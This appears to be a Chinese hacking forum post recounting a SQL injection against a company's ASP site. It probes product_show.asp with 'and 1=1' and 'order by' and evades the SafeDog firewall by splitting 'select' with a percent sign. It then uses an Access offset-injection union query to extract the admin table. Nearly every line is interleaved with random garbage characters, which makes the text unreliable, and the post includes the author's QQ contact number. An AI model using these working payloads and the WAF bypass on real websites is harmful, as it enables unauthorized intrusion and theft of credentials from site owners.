打开网站,一个企业站。
' {& D: f- ?( E
+ c8 J' @. \8 ?9 U+ ?: A4 v$ u- L' w* l' R/ O# ~) S# D
顺手加个admin( ?2 n" l! f3 @. z Z; z8 g
' p c! K/ I0 J6 ^6 C8 c
" j# b) d! d( n+ {# p. i默认后台。3 z+ f& _! b6 H* _& ~, d. I
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
& j( e; J+ M [1 P$ u4 ]. |" l- C# D9 D7 N
4 [8 Y& p o' Z; D( V3 u4 @! ?' Y
" L# J: V- j0 }
所以就不用御剑扫了,待会直接封IP。
+ l/ O) s1 C9 z3 _% Q; l
' D3 B& G. F/ Q D8 b1 S+ j9 p用order by语句判断是否存在注入。- y- ~* w* }% D
http://www.xxx.com /product_show.asp?id=997 order by 1: a. `$ g+ d2 t6 u7 S
http://www.xxx.com /product_show.asp?id=997 order by 1000 t, M, N% U+ p; S' ]+ t' M
现在存在注入,经测试后发现是9个字段。. P% |8 ^7 |( T! ^6 ]8 u/ F
5 |- H/ H/ I$ O. ^' \) S4 D
接下来进行联合查询,猜是否存在admin表。
" o! E+ Z1 d' O, `& Jhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
' Q# w* T. a5 `) ]# Y0 A5 m7 F r. \9 k1 X
! U. e/ D% m% d' ?( L+ a
5 C }! t4 t# e' p8 ?' M在select中间加个%,se%lect绕过安全狗。
k% J( C% ~5 ~& @' t
7 J F6 |+ o; o: T( [4 @- I3 ^$ [8 H2 d9 `: U5 A
发现存在admin表,然后开始手工猜常用的字段。
' ~. S5 m L6 A. b纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。; Z- O( Q. R, R0 b4 Y6 c. R
3 U0 [& Q# v5 a; J突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
5 Z3 B8 D' i3 e$ U/ @! Y 5 G* Z# y* F3 ]* b, W
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
+ W3 D5 A: A+ K5 d whttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
: D" p# E2 E3 v; C' p$ Z4 ^好了,敏感内容出显了。
6 P3 ?: W2 r5 D) r# }5 F' G
3 E$ W) z5 _& G( ?: p8 f( w
3 |, ?7 {0 b& i# a: a" v1 I& S* d8 Y8 Q5 }% |
|